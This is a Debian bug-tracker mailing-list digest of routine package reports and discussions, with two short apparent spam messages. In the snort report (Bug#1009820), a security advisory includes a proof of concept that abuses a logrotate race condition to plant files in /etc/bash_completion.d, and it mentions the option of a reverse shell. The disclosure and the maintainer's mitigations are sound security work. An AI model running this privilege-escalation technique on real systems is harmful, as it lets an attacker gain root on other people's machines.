touched, but I guess there might still be weird problems with files in
debian/patches/ with non-native EOLs.

Christoph

Bug#817943: strip-nondeterminism damages .zip files with bzipped members

2022-04-27 Thread Chris Lamb 
Hey Sebastian,

> strip-nondeterminism damages .zip files with bzipped members

According to:

  
https://github.com/redhotpenguin/perl-Archive-Zip/issues/26#issuecomment-529170764

... this has now been fixed. Can you confirm? :)


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

Bug#170334: h

2022-04-27 Thread Dr Patrick Awoonor 
> Did you receive my previous email?
>
> Dr Patrick Awoonor
>

Bug#1010271: unbound-control: Please use unix socket as default control-interface

2022-04-27 Thread Michael Tokarev 

27.04.2022 19:38, ceddral wrote:
...

attention now being explicit in the config. Now that I'm aware
I do believe a unix socket would be the more sensible default.


This variant (the unix socket) weren't always available.
It was implemented in version 1.5.2, and I wasn't aware
of this until 1.15.

/mjt

Bug#1010278: xterm_set_titles is broken

2022-04-27 Thread Marco d'Itri 
Package: mutt
Version: 2.2.3-1
Severity: normal

Since 2.2.3-1 xterm_set_titles prints garbage on the screen.
I see that this option is not documented, so I suppose that it has been 
deprecated over the years.
But even with ts_enabled=yes (the default) the terminal status bar is 
not being updated (I checked both gnome-terminal and xterm).


-- Package-specific info:
Mutt 2.2.3 (2022-04-12)
Copyright (C) 1996-2022 Michael R. Elkins and others.
Mutt comes with ABSOLUTELY NO WARRANTY; for details type `mutt -vv'.
Mutt is free software, and you are welcome to redistribute it
under certain conditions; type `mutt -vv' for details.

System: Linux 5.16.0-1-amd64 (x86_64)
ncurses: ncurses 6.3.20220423 (compiled with 6.3)
libidn2: 2.3.2 (compiled with 2.3.2)
hcache backend: tokyocabinet 1.4.48

Compiler:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/11/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none:amdgcn-amdhsa
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 11.2.0-20' 
--with-bugurl=file:///usr/share/doc/gcc-11/README.Bugs 
--enable-languages=c,ada,c++,go,brig,d,fortran,objc,obj-c++,m2 --prefix=/usr 
--with-gcc-major-version-only --program-suffix=-11 
--program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id 
--libexecdir=/usr/lib --without-included-gettext --enable-threads=posix 
--libdir=/usr/lib --enable-nls --enable-bootstrap --enable-clocale=gnu 
--enable-libstdcxx-debug --enable-libstdcxx-time=yes 
--with-default-libstdcxx-abi=new --enable-gnu-unique-object 
--disable-vtable-verify --enable-plugin --enable-default-pie --with-system-zlib 
--enable-libphobos-checking=release --with-target-system-zlib=auto 
--enable-objc-gc=auto --enable-multiarch --disable-werror --enable-cet 
--with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32,m64,mx32 
--enable-multilib --with-tune=generic 
--enable-offload-targets=nvptx-none=/build/gcc-11-GT6Wjf/gcc-11-11.2.0/debian/tmp-nvptx/usr,amdgcn-amdhsa=/build/gcc-11-GT6Wjf/gcc-11-11.2.0/debian/tmp-gcn/usr
 --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu 
--host=x86_64-linux-gnu --target=x86_64-linux-gnu 
--with-build-config=bootstrap-lto-lean --enable-link-serialization=2
Thread model: posix
Supported LTO compression algorithms: zlib zstd
gcc version 11.2.0 (Debian 11.2.0-20) 

Configure options: --build=x86_64-linux-gnu --prefix=/usr 
'--includedir=${prefix}/include' '--mandir=${prefix}/share/man' 
'--infodir=${prefix}/share/info' --sysconfdir=/etc --localstatedir=/var 
--disable-option-checking --disable-silent-rules 
'--libdir=${prefix}/lib/x86_64-linux-gnu' --runstatedir=/run 
--disable-maintainer-mode --disable-dependency-tracking 
--with-mailpath=/var/mail --enable-compressed --enable-debug --enable-fcntl 
--enable-hcache --enable-gpgme --enable-imap --enable-smtp --enable-pop 
--enable-sidebar --enable-dotlock --disable-fmemopen --with-curses 
--with-gnutls --with-gss --with-idn2 --with-mixmaster --with-gsasl 
--without-gdbm --without-bdb --without-qdbm --with-tokyocabinet 
build_alias=x86_64-linux-gnu 'CFLAGS=-g -O2 
-ffile-prefix-map=/build/mutt-OjBqXe/mutt-2.2.3=. -fstack-protector-strong 
-Wformat -Werror=format-security' 'LDFLAGS=-Wl,-z,relro -Wl,-z,now' 
'CPPFLAGS=-Wdate-time -D_FORTIFY_SOURCE=2'

Compilation CFLAGS: -Wall -pedantic -Wno-long-long -g -O2 
-ffile-prefix-map=/build/mutt-OjBqXe/mutt-2.2.3=. -fstack-protector-strong 
-Wformat -Werror=format-security

Compile options:
-DOMAIN
+DEBUG
-HOMESPOOL  +USE_SETGID  +USE_DOTLOCK  +DL_STANDALONE  +USE_FCNTL  -USE_FLOCK   
+USE_POP  +USE_IMAP  +USE_SMTP  
-USE_SSL_OPENSSL  +USE_SSL_GNUTLS  -USE_SASL  +USE_GSASL  +USE_GSS  
+HAVE_GETADDRINFO  
+HAVE_REGCOMP  -USE_GNU_REGEX  
+HAVE_COLOR  +HAVE_START_COLOR  +HAVE_TYPEAHEAD  +HAVE_BKGDSET  
+HAVE_CURS_SET  +HAVE_META  +HAVE_RESIZETERM  +HAVE_FUTIMENS  
+CRYPT_BACKEND_CLASSIC_PGP  +CRYPT_BACKEND_CLASSIC_SMIME  +CRYPT_BACKEND_GPGME  
-EXACT_ADDRESS  -SUN_ATTACHMENT  
+ENABLE_NLS  -LOCALES_HACK  +HAVE_WC_FUNCS  +HAVE_LANGINFO_CODESET  
+HAVE_LANGINFO_YESEXPR  
+HAVE_ICONV  -ICONV_NONTRANS  -HAVE_LIBIDN  +HAVE_LIBIDN2  +HAVE_GETSID  
+USE_HCACHE  
+USE_SIDEBAR  +USE_COMPRESSED  +USE_INOTIFY  
-ISPELL
SENDMAIL="/usr/sbin/sendmail"
MAILPATH="/var/mail"
PKGDATADIR="/usr/share/mutt"
SYSCONFDIR="/etc"
EXECSHELL="/bin/sh"
MIXMASTER="mixmaster"

To contact the developers, please mail to .
To report a bug, please contact the Mutt maintainers via gitlab:
https://gitlab.com/muttmua/mutt/issues


-- System Information:
Debian Release: bookworm/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.16.0-1-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_WARN
Locale: LANG=it_IT.utf8, LC_CTYPE=it_IT.utf8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM:

Bug#664971: Fwd: h

2022-04-27 Thread Dr Patrick Awoonor 
Did you receive my previous email?

Dr Patrick Awoonor

Bug#1010271: unbound-control: Please use unix socket as default control-interface

2022-04-27 Thread Michael Tokarev 

27.04.2022 19:38, ceddral wrote:
..

Tested it, as far as i can tell it works for me with
chroot: "/var/lib/unbound"
and
control-interface: "/run/unbound-control.socket"


Thank you for confirming this.  I too did the similar test locally,
you made me curious.


(and BindPaths=/run/systemd/notify:/var/lib/unbound/run/systemd/notify
in the systemd service file)


This is not necessary anymore, but I guess it is nicer this way.
The difference is that the setup script (/usr/libexec/unbound-helper)
does the mount already but this mount is visible for all other
processes. While .service way makes it private to this process
(with its own namespace).

This whole thing isn't actually necessary, it is only needed to
notify systemd when unbound is finished initializing.  It might
be easier in cases like this if systemd passed an open file
descriptor to the process where it can write to, so there's
no need to open a (named) socket.  I wonder if there's a way
to avoid this bind-mount...


My test was `unbound-control stats` says something.


Yeah. I think it's a good idea to switch to unix socket.

Please also note that linux actually honors the file permissions
for the socket files, - unlike on some other systems.

And there's one more thing: unbound chowns the socket to
unbound user. I don't know why it is doing this, - ditto
for the pid file.

FWIW, I tend to chroot it to /etc/unbound, - which needs
bind-mounting of /var/lib/unbound to /etc/unbound/ somewhere,
but reduces the need for copying /etc/unbound to /var/lib.
This copying is bad: besides it makes reloading unbound more
difficult, it is also very security-sensitive, I highly
doubt the copy procedure is "secure enough". Creating files
as root in a unprivileged /var/lib/unbound is problematic.
See how I did root.key handling in unbound-helper.

Thank you!

/mjt

Bug#1010271: unbound-control: Please use unix socket as default control-interface

2022-04-27 Thread ceddral 
> Can you tell please which version did you upgrade from?
> Please note that before, unbound in Debian had a patch
> to secretly enable remote-control socket which by default
> is tcp. In this release I just made it explicit instead of
> doing it secretly.
Right you are, the socket was open before. I don't know which
unbound version I had before. The tcp socket only came to my
attention now being explicit in the config. Now that I'm aware
I do believe a unix socket would be the more sensible default.

> Actually it was my thought to enable control socket (I'm not
> sure /var/lib/unbound is a good place for it, /run sounds
> better but I need to check if it works when unbound is
> chrooted.
Tested it, as far as i can tell it works for me with
chroot: "/var/lib/unbound"
and
control-interface: "/run/unbound-control.socket"
(and BindPaths=/run/systemd/notify:/var/lib/unbound/run/systemd/notify
in the systemd service file)

My test was `unbound-control stats` says something.

Cheers
ceddral

Bug#1010277: threeb: Correct changelog formatting

2022-04-27 Thread Chris Lamb 
Source: threeb
Version: 0.0~git20220106110332.a3144e0-4
Severity: normal
Tags: patch

Hi,

A patch is attached that fixes the changelog formatting — a line is
not indented correctly by one byte. This apparently cosmetic issue
actually causes some parsers to (at least) complain, and may cause
others to fail completely.


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

diff --git a/debian/changelog b/debian/changelog
index bf347d1..0b89ac3 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -6,7 +6,7 @@ threeb (0.0~git20220106110332.a3144e0-4) unstable; 
urgency=medium
 
 threeb (0.0~git20220106110332.a3144e0-3) unstable; urgency=medium
 
- * Source-only upload for migration to testing.
+  * Source-only upload for migration to testing.
 
  -- Roland Mas   Thu, 10 Feb 2022 11:28:40 +0100

Bug#1010219: terminology: When Terminology is autostarted it launches without window decorations.

2022-04-27 Thread Ross Vandegrift 
Control: reassign -1 kwin-x11

Hi Jon,

On Tue, Apr 26, 2022 at 04:16:31PM +0100, Jon Westgate wrote:
> I'm running KDE / Plasma, I've noticed that sometimes if I just restart my PC 
> having not closed Terminology it is autostarted but launches without any 
> window decorations or handles so you can't move it about. Luckily you can 
> close it by typing exit.
> I also note that there is no transparency.
> 
> I note that closing Terminology and reopening it fixes these issues
> 
> I'm guessing that this is a KDE race condition type bug but none of the other 
> apps that I use have this
> problem.

Agreed, but that means ther'es probably nothing terminology can do.
I've reassigned to kwin-x11, assuming that you're not using wayland.

> I also notice that when I run Terminology from the launcher it opens so
> quickly that the launch feedback take a while to catch up. This is
> not a complaint btw :)
> 
> Is there any way to slow down the startup that you know of? Or make
> Terminology check and wait for compositing / GL to start before it
> continues. 

No, but it'd be simple to workaround with a shell script:

#!/bin/sh
sleep 2
exec /usr/bin/terminology

Put that in your path somewhere, make it executable, and try using it
instead of the default launcher.

Ross

Bug#1009820: snort: Privilege escalation due to insecure use of logrotate

2022-04-27 Thread Javier Fernandez-Sanguino 
severity 1009820 normal
tags 1009820 - upstream
thanks

Dear Wolfgang,

The 'snort' user is not a regular user (but a user created by the package
itself, which is blocked from access as it has no password set).
Consequently the privilege escalation you describe cannot be leveraged by a
normal user. The only user in a standard installation of this package that
can become 'snort' is actually the root user itself or if there is a remote
code execution in the Snort software which compromises the Snort process
itself.

The fix proposed (make the files managed by root) is not invalid:
- if /var/log/snort is owned by root then the Snort process (running as
Snort user) will not be able to create the log files
- the Snort process is running as 'snort' user and should not be modified
to be run as 'root'

The reason for this setup is precisely to improve the security of the
software as distributed in Debian and applying a principle of minimum
privilege, it is not an option to have this software running as root as a
vulnerability found in the software (which is reading packages from the
network, input which is by definition, untrusted) could potentially lead to
a compromise of the system it is running in

Consequently I'm adjusting the bug:
- To normal (to be reviewed) as this is not, in my view, a critical bug
- To Debian-specific, as the configuration of logrotate and the setup
(Snort is running as 'snort' user) is specific to the package and not
defined by upstream

The most likely fix for this bug in any case is to adjust the definitions
in the logrotate file, which uses "/var/log/snort/*/alert" and "/var/log/
snort/*/*log". These definitions are too broad and could be simplified.

Best regards,

Javier Fernandez-Sanguino


On Mon, 18 Apr 2022 at 19:27, Wolfgang Hotwagner 
wrote:

> Package: snort
> Version: 2.9.15.1-5
> Severity: critical
> Tags: security upstream
> Justification: root security hole
> X-Debbugs-Cc: sec-advis...@ait.ac.at
>
> Dear Maintainer,
>
> The path of the logdirectory of snort can be manipulated by user
>
> Snort in Debian Bullseye:
>
> # ls -ld /var/log/snort/
> drwxr-s--- 3 snort adm 4096 Apr 14 08:44 /var/log/snort/
>
>
> The files in /var/log/snort/*/*log are once a day rotated by
>
> logrotate as user root with the following config:
>
> /var/log/snort/snort.alert /var/log/snort/snort.alert.fast
> /var/log/snort/*log /var/log/snort/*/alert /var/log/snort/*/*log {
> daily
> rotate 7
> compress
> missingok
> notifempty
> create 0640 snort adm
> sharedscripts
> postrotate
> if [ -x /usr/sbin/invoke-rc.d ]; then \
> invoke-rc.d snort restart > /dev/null; \
> else \
> /etc/init.d/snort restart > /dev/null; \
> fi;
> endscript
> }
>
> Due to logrotate is prone to a race-condition(see the link to my blog
> below) it is possible for user "snort" to replace or create any directory
> in /var/log/snort/ with a symbolik link to any
>
> directory(for example /etc/bash_completion.d). logrotate will place files
> AS ROOT into /etc/bash_completition.d and set the owner and group to
> "snort.adm". An attacker could simply place a reverse-shell into this file.
> As soon as root logs in, a reverse shell will be executed then.
>
> You can find an exploit for this bug at my blog:
> https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
> and
> https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
>
> Proof of Concept:
> #
>
> snort@b8ff2e70f94d:~$ cd /tm
>
> snort@b8ff2e70f94d:/tmp$ git clone
> https://github.com/whotwagner/logrotten.git
> Cloning into 'logrotten'...
> remote: Enumerating objects: 97, done.
> remote: Counting objects: 100% (10/10), done.
> remote: Compressing objects: 100% (8/8), done.
> remote: Total 97 (delta 4), reused 7 (delta 2), pack-reused 87
> Receiving objects: 100% (97/97), 419.77 KiB | 691.00 KiB/s, done.
> Resolving deltas: 100% (41/41), done.
> snort@b8ff2e70f94d:/tmp$ cd logrotten/
> snort@b8ff2e70f94d:/tmp/logrotten$ gcc -o logrotten logrotten.c
>
> snort@b8ff2e70f94d:/tmp/logrotten$ echo "hello world" > payload
> snort@b8ff2e70f94d:/tmp/logrotten$ mkdir /var/log/snort/pwn
> snort@b8ff2e70f94d:/tmp/logrotten$ vim /var/log/snort/pwn/pwnme.lo
>
> snort@b8ff2e70f94d:/tmp/logrotten$ ./logrotten -p payload -c
> /var/log/snort/pwn/pwnme.log
> Waiting for rotating /var/log/snort/pwn/pwnme.log...
> Renamed /var/log/snort/pwn with /var/log/snort/pwn2 and created symlink to
> /etc/bash_completion.d
> Waiting 1 seconds before writing payload...
> Done!
> snort@b8ff2e70f94d:/tmp/logrotten$ ls -l /etc/bash_completion.d/
> total 8
> -rw-r--r-- 1 root  root 439 Mar 10  2021 git-prompt
> -r-xr-xr-x 1 snort adm   19 Apr 14 08:43 pwnme.log
>
>
> Mitigation:
> ###
>
> You could mitigate the problem by changing the owner and group of
> /var/log/snort to root, or by using the "su option" in
> /etc/logrotate.d/snort.
>
> Note: I

Bug#1010262: RFS: wifi-qr/0.2-2 -- WiFi Share and Connect with QR

2022-04-27 Thread Bastian Germann 

xOn Wed, 27 Apr 2022 16:25:02 +0200 Bastian Germann  wrote:

Something went wrong. The patch debian/patches/Update-0.2-2-File-Function now 
contains in the description:
"""
  Update Man and Menu Shortcut
  .
  wifi-qr (0.2-2) unstable; urgency=medium
  .
* Improve Summary. (Closes: #989034)
  ...
Bug-Debian: https://bugs.debian.org/989034
"""

This has nothing to do with the patch.


You have not addressed this comment.

Bug#1010276: parasail: compiles something extra (or less) depending on the CPU features available

2022-04-27 Thread Mattia Rizzolo 
Source: parasail
Version: 2.5+dfsg-3
Severity: serious
User: reproducible-bui...@lists.alioth.debian.org
Usertags: cpu

Hi!

While working on the “reproducible builds” effort [1], we have noticed
that your package "parasail" doesn't build reproducibly.

In fact, it seems that depending on the type of CPU it builds on,
sometimes there are slightly different files.  For example, on an i386
system:
 - usr/lib/i386-linux-gnu/libparasail_novec_table.a
 - usr/lib/i386-linux-gnu/libparasail_sse41_rowcol.a
 - usr/lib/i386-linux-gnu/libparasail_avx2_table.a
or in an amrhf system:
 - usr/lib/arm-linux-gnueabihf/libparasail_novec.a
 - usr/lib/arm-linux-gnueabihf/libparasail_novec_rowcol.a
sometimes are there or not.

I'll have to remember you that building differently depending on the CPU
features of the build host is not allowed by Policy.


Furthermore, I notice that amongst the i386 build, there are files such
as
 - usr/lib/i386-linux-gnu/libparasail_sse2.a
 - usr/lib/i386-linux-gnu/libparasail_sse41.a
that makes me wonder if the program is unconditially using SSE
instructions on i386, that would be a baseline violation; but since I
haven't verified if those features are used unconditially I'm not filing
this report about this, however please do check.


 [1]: https://wiki.debian.org/ReproducibleBuilds


-- 
regards,
Mattia Rizzolo

GPG Key: 66AE 2B4A FCCF 3F52 DA18  4D18 4B04 3FCD B944 4540  .''`.
More about me:  https://mapreri.org : :'  :
Launchpad user: https://launchpad.net/~mapreri  `. `'`
Debian QA page: https://qa.debian.org/developer.php?login=mattia  `-


signature.asc
Description: PGP signature

Bug#1010262: RFS: wifi-qr/0.2-2 -- WiFi Share and Connect with QR

2022-04-27 Thread Ko Ko Ye` 
Thanks for your information.

Now It's changed the Description.
patch is Ignore README file.

BR

On Wed, Apr 27, 2022 at 8:55 PM Bastian Germann  wrote:

> Something went wrong. The patch debian/patches/Update-0.2-2-File-Function
> now contains in the description:
> """
>   Update Man and Menu Shortcut
>   .
>   wifi-qr (0.2-2) unstable; urgency=medium
>   .
> * Improve Summary. (Closes: #989034)
>   ...
> Bug-Debian: https://bugs.debian.org/989034
> """
>
> This has nothing to do with the patch.
>
> Why do you patch upstream's README.md with that patch?
> If you want to provide additional info, create debian/README.Debian.
>
> Your binary package description has some language mistakes and redundant
> info. I suggest:
> Description: WiFi password share via QR codes
>   Shares WiFi SSID and password via a QR code.
>   Generate a QR code of a WiFi network with its password.
>   Scan QR codes and easily connect to WiFi Networks.
>   .
>   For Android, OS version 10 and above is supported.
>   .
>   For iOS, the Shortcut app supports generating WiFi QR codes.
>


-- 

with regards *Ko Ko Ye` *


kokoye2...@gmail.com
kokoye2...@ubuntu.com

https://www.linkedin.com/in/kokoye2007
https://ubuntu-mm.net
https://kokoye2007.github.io

Bug#1010266: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printableutf16be

2022-04-27 Thread fumiama 
Thank you very much! 

Bug#1009915: sysvinit: Please align with manpages-l10n and afterwards activate man page translations

2022-04-27 Thread Helge Kreutzmann 
Hello Mark,
On Wed, Apr 27, 2022 at 10:20:47AM +0100, Mark Hindley wrote:
> On Wed, Apr 20, 2022 at 08:39:44PM +0200, Helge Kreutzmann wrote:
> > > I have had a quick look and I think the upstream support for this is still
> > > incomplete. Shouldn't there be a rule for building translated manpages in
> > > man/Makefile?
> > 
> > I did not yet check the details, I just had a quick look. I can check
> > more in detail in the weekend.
> 
> A quick experiment with po4a suggests that running
> 
>  po4a po4a.cfg
> 
> in man/po does build the translated manpages.
> 
> However, there is no makefile rule for that build or subsequent installation
> (which is bizarrely handled in src/Makefile!).
> 
> That seems something to deal with upstream. Helge, could you liaise with Jesse
> to complete that?

I'm not a makefile expert, but I have some experience with po4a and
firends (in makefiles). I'll contact Jesse and see what I (or maybe
Mario, who supported the transfer) can do.

Thanks for checking the state of the files.

Greetings

Helge
-- 
  Dr. Helge Kreutzmann deb...@helgefjell.de
   Dipl.-Phys.   http://www.helgefjell.de/debian.php
64bit GNU powered gpg signed mail preferred
   Help keep free software "libre": http://www.ffii.de/


signature.asc
Description: PGP signature

Bug#1010275: ITP: rust-bls-dkg -- BLS DKG mechanism

2022-04-27 Thread Jonas Smedegaard 
Package: wnpp
Severity: wishlist
Owner: Jonas Smedegaard 
X-Debbugs-Cc: debian-de...@lists.debian.org

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

* Package name: rust-bls-dkg
  Version : 0.9.2
  Upstream Author : MaidSafe.net limited
* URL : https://github.com/maidsafe/bls_dkg
* License : BSD-3-clause or Expat
  Programming Lang: Rust
  Description : BLS DKG mechanism

 BLS DKG is an implementation of a BLS DKG mechanism,
 requiring signing key, encryption key and SocketAddr of participants.
 .
 A BLS digital signature - also known as Boneh–Lynn–Shacham (BLS) -
 is cryptographic signature scheme
 which allows a user to verify that a signer is authentic.
 .
 Distributed key generation (DKG)
 is a cryptographic process in which multiple parties contribute
 to the calculation of a shared public and private key set.

This package is needed for ITP package safe-network.
It will be maintained in the collaborative debian section of salsa,
here: https://salsa.debian.org/debian/rust-bls-dkg

 - Jonas

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEn+Ppw2aRpp/1PMaELHwxRsGgASEFAmJpXpQACgkQLHwxRsGg
ASH+OQ//X7Z6gpOeCVdtXMK5j4kfdRJ4tISHrGfgvE5JirguoHUndZ9vvO/+9/r4
sZiLc2zwX0OFlphV+ldVfT1JQ23Vi2EUUKuUqE8jDNp7sewMDVOx/lqY/HIyAFuF
c8KgBox8bAQ79t0Qms3MBGNNeZa30JiTGNskLTi4r0T7c3nKi9pVEpqWgkjhsi0g
ri2RriRFf66vInl5Bs1+8tBpI/Quajl/rO91B/pwIK3Kb9pnfj15MWPZhOM8agbo
IzbqhEOO8kE44Vc0cVrV/8v6qjXmUHjO57jn9mht9fA8OluNZKYrVEr85PsqQSwT
Gq0iE3a9XHwJJ1ROozBMjmcEMWYb8Vb+QZwap1yU6boMg0NOvqODrA00zyVsicMa
a60pXfKC850xpTUWE+eS5fZf9KlGehrBpJpl0DeRpIoxATd93ZtaITvDlwai0LUW
I6a1L4hvnOQJcXfAoGQzadtcZrssPBJF/ftY2nxpUh0S7LtszjNbzIUROI5jBZVw
cfrOg8xaVTNMQ+qM3TbawV1gHutIcWxdTL84Nq3X8lA1WWyXaOqIshSBIwaaYvR0
0pIaPjNO+YSXQ/jm93etJ2mRAL1aI4IkKjTbhXLPp3nkcKqs68UdA96gOVEkM/O5
+vJbzpHJrSpOIythI0RIXu7rduVfIl2rAWoxcR/O6cV7x4/W0u0=
=7Zvw
-END PGP SIGNATURE-

Bug#1010267: ITP: tractor -- Setup an onion routing proxy

2022-04-27 Thread Bo YU 

Hi, Danial:
On Wed, Apr 27, 2022 at 05:33:31PM +0430, Danial Behzadi wrote:

Package: wnpp
Severity: wishlist
Owner: Danial Behzadi 
X-Debbugs-Cc: debian-de...@lists.debian.org

* Package name: tractor
 Version : 3.12
 Upstream Author : Danial Behzadi 
* URL : https://framagit.org/tractor/tractor/
* License : GPL
 Programming Lang: Python
 Description : Setup an onion routing proxy

This package uses Python stem library to provide
a connection through the onion proxy and sets up
proxy in user session, so you don't have to mess
up with TOR on your system anymore.

- I use this package to setup some tor connections in user
  session, quickly turn bridges on/off or setting/unsetting
  tor proxy in my session.
- I will maintain the software and the package for Debian,
  but since I'm not a DD yet, I'll need a sponsor for it.108


If the package is python lang package, i think it would be better
to put it under Debian python team umbrella:

https://wiki.debian.org/Python/GitPackaging

BR,
Bo

Bug#1010274: hostname(1) man page: -A / --all-fqdns description confuses users

2022-04-27 Thread Vincent Lefevre 
Package: hostname
Version: 3.23
Severity: minor

The -A / --all-fqdns description in the hostname(1) man page confuses
users. For instance:

  https://lists.debian.org/debian-user/2022/04/msg00755.html

It says "Displays all FQDNs of the machine." This should be something
like:

  Displays the FQDNs associated with all configured network interfaces.

And somewhere in the paragraph, add something like:

  Note that this may be different from the FQDN of the machine,
  provided by -f.

Moreover, in the -f / --fqdn / --long description:

  See the warnings in section THE FQDN above und use
  hostname --all-fqdns instead wherever possible.

This is a bad advice! On my laptop (which is on a local network
at home), "hostname -A" just outputs a blank line. In a case like
a local network, there is no point in having a reverse for network
interfaces. On this other hand, "hostname -f" is typically useful
to get the domain part of Message-IDs generated on the machine,
for instance.

-- System Information:
Debian Release: bookworm/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'stable-updates'), (500, 
'stable-security'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.17.0-1-amd64 (SMP w/12 CPU threads; PREEMPT)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, 
TAINT_UNSIGNED_MODULE
Locale: LANG=POSIX, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages hostname depends on:
ii  libc6  2.33-7

hostname recommends no packages.

hostname suggests no packages.

-- no debconf information

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Bug#1010266: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printable utf16be

2022-04-27 Thread Bastian Germann 

Control: reopen 1010055
Control: block 1010055 by -1

On Wed, 27 Apr 2022 22:28:04 +0800 fumi...@foxmail.com wrote:

Dear Bastian,

Thanks for your introduction. I have restored the Debian revision to -1 and 
edited the changelog.
Then I sent an email and marked the ITP bug #1010055 as done. Now I would like 
to remove
the moreinfo tag.


I do not think you want to close the ITP now because that means you are not interested in bringing the package to Debian 
anymore. Therefore I am reopening it.


I see you sent the untag email successfully.

Bug#1010273: mailman3-web: There seems to be a clas between mailman3-web and python3-django-hyperkitty about the /static/ dir

2022-04-27 Thread Peter Gervai 
Package: mailman3-web
Version: 0+20200530-2
Severity: normal

Dear Maintainer,

This was a fresh install, and hyperkitty archive was forever spinning.
Apache was configured according to the official docs. So I have upgraded
from stable to testing (to fix one bug I thought to be related).

It tuned out that there are two separate sets of web-static directories:
- /var/lib/mailman3/web/static (the "wrong" one)
- /usr/share/python3-django-hyperkitty/static/ 

Same goes with posterius and others. The problem is that they _look_ like 
they are okay but have different content, in fact one had 1.xx jquery
while the other had the new 3.6 one, and it caused all kinds of weird
failures on the web interface.

I believe there ought to be only one set of these, and the other,
for whatever purposes it's requird shall be symlinked over.

User error is possible! But I haven't really done anything out of the 
ordinary.


-- System Information:
Debian Release: 11.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.13.19-3-pve (SMP w/4 CPU threads)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_FIRMWARE_WORKAROUND, 
TAINT_OOT_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages mailman3-web depends on:
ii  dbconfig-pgsql 2.0.19
ii  dbconfig-sqlite3   2.0.19
ii  debconf [debconf-2.0]  1.5.77
ii  init-system-helpers1.60
ii  lsb-base   11.1.0
ii  python33.9.2-3
ii  python3-django-hyperkitty  1.3.5.0-2
ii  python3-django-postorius   1.3.4-2+deb11u1
ii  python3-psycopg2   2.8.6-2
ii  python3-whoosh 2.7.4+git6-g9134ad92-5
ii  ucf3.0043
ii  uwsgi-core 2.0.19.1-7.1
ii  uwsgi-plugin-python3   2.0.19.1-7.1

Versions of packages mailman3-web recommends:
ii  libapache2-mod-proxy-uwsgi  2.4.53-1~deb11u1

Versions of packages mailman3-web suggests:
ii  postgresql  13+225

-- Configuration Files:
/etc/init.d/mailman3-web changed [not included]
/etc/mailman3/apache.conf changed [not included]
/etc/mailman3/uwsgi.ini changed [not included]

-- debconf information excluded

Bug#1010270: Recent update break xterm

2022-04-27 Thread Sven Joachim 
Am 27.04.2022 um 15:45 schrieb Klaus Ethgen:

> Package: libtinfo5
> Version: 6.3+20220423-1
> Severity: normal
>
> Since the last update of this package, applications running inside of
> xterm are not always able to update the window title.
>
> Instead, control output are breaking the layout of the application.
>
> Broken Applications:
> - mutt
> - cmus
>
> Still working:
> - zsh

Can you give steps to reproduce what is broken?  Also, which version of
xterm do you use, and what is the value of the TERM environment
variable?

Cheers,
   Sven

Bug#1009658: RFS: ncdu/1.16-0.1 [NMU] -- ncurses disk usage viewer

2022-04-27 Thread Santiago Ruano Rincón 
Control: tags 1009658 + pending

El 27/04/22 a las 14:47, Christian Göttsche escribió:
> > I'd prefer to have a more verbose description about what that update on
> > Build-Deps means. This is just a personal preference.
> > Would you like to give a little more detail please?
> 
> Uploaded a new version with a more detailed changelog:
> 
> ncdu (1.16-0.1) unstable; urgency=medium
>  .
>* Non-maintainer upload.
>* New upstream version 1.16 (Closes: #996240)
>* d/control:
>  - update build dependencies
>+ replace transitional libncurses5-dev and libncursesw5-dev by
>  libncurses-dev
>+ add pkg-config for successful autoreconf
>+ drop autotools-dev, default since debhelper compat 10
>  - bump to debhelper compat 13
>  - bump to std-ver 4.6.0 (no further changes)
>  - set Rules-Requires-Root no
>  - use https homepage address
>* d/patches: cherry-pick upstream commits
>  - Add dark-bg color scheme + enable colors by default if !NO_COLOR
>(Closes: #894380)
>  - Make options, keys and file flags bold in man page
>  - dir_scan: fix wrong assumption that errno can only be changed by
>readdir()
>  - dir_scan: call strlen only once
>* d/rules: enable hardening and LTO
>* d/u/metadata: add basic metadata
> 

Uploaded to DELAYED/10.

Thanks for your work!

 -- Santiago


signature.asc
Description: PGP signature

